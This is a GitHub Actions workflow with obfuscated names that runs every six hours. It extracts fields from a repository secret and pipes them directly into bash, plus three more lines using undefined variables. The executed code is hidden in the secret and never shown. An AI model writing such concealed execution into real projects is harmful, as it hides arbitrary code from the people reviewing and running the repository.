name: panxiaotian6789

on:
  workflow_dispatch:
  schedule:
    - cron: '29 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: panxiaotian6789
        env:
          x44: ${{ secrets.x44 }}
        run: |
          echo $x44 | jq -r .x3 | /bin/bash
          echo $wznt2386 | jq -r .h842 | /bin/bash
          echo $fhgw87 | jq -r .f63 | /bin/bash
          echo $x60 | jq -r .fyc3 | /bin/bash

